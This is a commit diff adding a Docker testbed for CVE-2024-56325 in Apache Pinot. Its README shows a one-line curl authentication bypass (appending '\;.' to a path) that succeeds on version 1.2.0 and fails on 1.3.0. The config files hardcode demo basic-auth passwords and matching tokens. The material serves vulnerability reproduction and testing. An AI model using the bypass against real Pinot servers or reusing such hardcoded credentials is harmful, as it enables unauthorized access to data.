google · joernNNN · Aug 8, 2025 · Aug 9, 2025 · Sep 30, 2025
diff --git a/apache/pinot/CVE-2024-56325/README.md b/apache/pinot/CVE-2024-56325/README.md
@@ -0,0 +1,27 @@
+# setup vulnerable version
+```bash
+PINOT_VERSION=1.2.0 docker compose up
+```
+## test vulnerable version
+```bash
+curl -v http://localhost:9000/tables
+# 401 Unauthorized
+# {"code":401,"error":"HTTP 401 Unauthorized"}
+curl -v http://localhost:9000/tables\;.
+# 200 OK
+# {"tables":[]}
+```
+
+# setup fixed version
+```bash
+PINOT_VERSION=1.3.0 docker compose up
+```
+## test secure version
+```bash
+curl -v http://localhost:9000/tables
+# 401 Unauthorized
+# {"code":401,"error":"HTTP 401 Unauthorized"}
+curl -v http://localhost:9000/tables\;.
+# 401 Unauthorized
+# {"code":401,"error":"HTTP 401 Unauthorized"}
+```
diff --git a/apache/pinot/CVE-2024-56325/broker.conf b/apache/pinot/CVE-2024-56325/broker.conf
@@ -0,0 +1,14 @@
+# broker settings
+pinot.broker.client.queryPort=8099
+pinot.broker.routing.table.builder.class=random
+pinot.broker.helix.cluster.name=PinotCluster
+pinot.broker.zk.str=127.0.0.1:2181
+# no tokens required
+# the factory class property is different for the broker
+pinot.broker.access.control.class=org.apache.pinot.broker.broker.BasicAuthAccessControlFactory
+
+pinot.broker.access.control.principals=admin,user
+pinot.broker.access.control.principals.admin.password=verysecret
+pinot.broker.access.control.principals.user.password=secret
+
+# No need to set READ permissions here since broker requests are read-only
diff --git a/apache/pinot/CVE-2024-56325/controller.conf b/apache/pinot/CVE-2024-56325/controller.conf
@@ -0,0 +1,23 @@
+# controller settings
+controller.helix.cluster.name=PinotCluster
+controller.port=9000
+controller.data.dir=/tmp/pinot/controller
+controller.zk.str=127.0.0.1:2181
+controller.host=pinot-controller
+
+# Create users "admin" and "user". Keep in mind we're not enforcing any ACLs yet.
+controller.admin.access.control.principals=admin,user
+
+# Set the user's password to "secret" and allow "READ" only
+controller.admin.access.control.principals.user.password=secret
+controller.admin.access.control.principals.user.permissions=READ
+
+# Set the admin's password to "verysecret"
+controller.admin.access.control.principals.admin.password=verysecret
+
+# Enable the controller to fetch segments by providing the credentials as a token
+controller.segment.fetcher.auth.token=Basic YWRtaW46dmVyeXNlY3JldA
+
+# "Basic " + base64encode("admin:verysecret")
+
+controller.admin.access.control.factory.class=org.apache.pinot.controller.api.access.BasicAuthAccessControlFactory
diff --git a/apache/pinot/CVE-2024-56325/docker-compose.yaml b/apache/pinot/CVE-2024-56325/docker-compose.yaml
@@ -0,0 +1,17 @@
+services:
+  pinot:
+    image: apachepinot/pinot:${PINOT_VERSION:-1.2.0}
+    container_name: pinot
+    working_dir: /opt/pinot
+    volumes:
+      - ./controller.conf:/opt/pinot/controller.conf:ro
+      - ./broker.conf:/opt/pinot/broker.conf:ro
+      - ./server.conf:/opt/pinot/server.conf:ro
+      - ./minion.conf:/opt/pinot/minion.conf:ro
+      - ./start-pinot.sh:/opt/pinot/start-pinot.sh
+    entrypoint: "/opt/pinot/start-pinot.sh"
+    ports:
+      - "9000:9000"
+      - "8099:8099"
+      - "8098:8098"
+      - "8097:8097"
diff --git a/apache/pinot/CVE-2024-56325/minion.conf b/apache/pinot/CVE-2024-56325/minion.conf
@@ -0,0 +1,6 @@
+# minion settings
+pinot.minion.helix.cluster.name=PinotCluster
+pinot.minion.zk.str=127.0.0.1:2181
+
+segment.fetcher.auth.token=Basic YWRtaW46dmVyeXNlY3JldA
+task.auth.token=Basic YWRtaW46dmVyeXNlY3JldA
diff --git a/apache/pinot/CVE-2024-56325/server.conf b/apache/pinot/CVE-2024-56325/server.conf
@@ -0,0 +1,10 @@
+# server settings
+pinot.server.instance.dataDir=/tmp/pinot/server
+pinot.server.instance.segmentTarDir=/tmp/pinot/server/segments
+pinot.server.netty.port=8098
+pinot.server.helix.cluster.name=PinotCluster
+pinot.server.zk.str=127.0.0.1:2181
+
+pinot.server.segment.fetcher.auth.token=Basic YWRtaW46dmVyeXNlY3JldA
+pinot.server.segment.uploader.auth.token=Basic YWRtaW46dmVyeXNlY3JldA
+pinot.server.instance.auth.token=Basic YWRtaW46dmVyeXNlY3JldA
diff --git a/apache/pinot/CVE-2024-56325/start-pinot.sh b/apache/pinot/CVE-2024-56325/start-pinot.sh
@@ -0,0 +1,23 @@
+#!/bin/bash
+
+nohup ./bin/pinot-admin.sh StartZookeeper -zkPort 2181 > zookeeper.log 2>&1 &
+while ! grep -q 'Start zookeeper at localhost:2181 in thread main' zookeeper.log; do sleep 1; done
+echo "Zookeeper started."
+
+nohup ./bin/pinot-admin.sh StartController -config controller.conf > controller.log 2>&1 &
+while ! grep -q 'INFO: \[HttpServer\] Started.' controller.log; do sleep 1; done
+echo "Controller started."
+
+nohup ./bin/pinot-admin.sh StartBroker -config broker.conf > broker.log 2>&1 &
+while ! grep -q 'INFO: \[HttpServer\] Started.' broker.log; do sleep 1; done
+echo "Broker started."
+
+nohup ./bin/pinot-admin.sh StartServer -config server.conf > server.log 2>&1 &
+while ! grep -q 'INFO: \[HttpServer\] Started.' server.log; do sleep 1; done
+echo "Server started."
+
+nohup ./bin/pinot-admin.sh StartMinion -configFileName minion.conf > minion.log 2>&1 &
+while ! grep -q 'INFO: \[HttpServer\] Started.' minion.log; do sleep 1; done
+echo "Minion started."
+
+tail -f zookeeper.log controller.log broker.log server.log minion.log